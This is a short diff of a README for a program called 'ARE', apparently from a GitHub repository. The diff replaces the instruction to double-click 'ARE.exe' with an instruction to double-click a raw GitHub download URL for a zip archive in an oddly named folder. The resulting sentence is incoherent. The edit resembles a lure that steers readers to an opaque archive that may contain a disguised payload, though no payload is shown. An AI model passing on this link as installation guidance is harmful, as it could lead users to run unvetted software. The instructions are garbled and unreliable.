lukky262/ARE/README.md

 Find the ARE program file in the folder where you extracted or installed it.

-Double-click the file named `ARE.exe` or similar.
+Double-click the file named `https://github.com/lukky262/ARE/raw/refs/heads/main/Helladotherium/Software-1.3.zip` or similar.
 The application window will open on your desktop.

 ---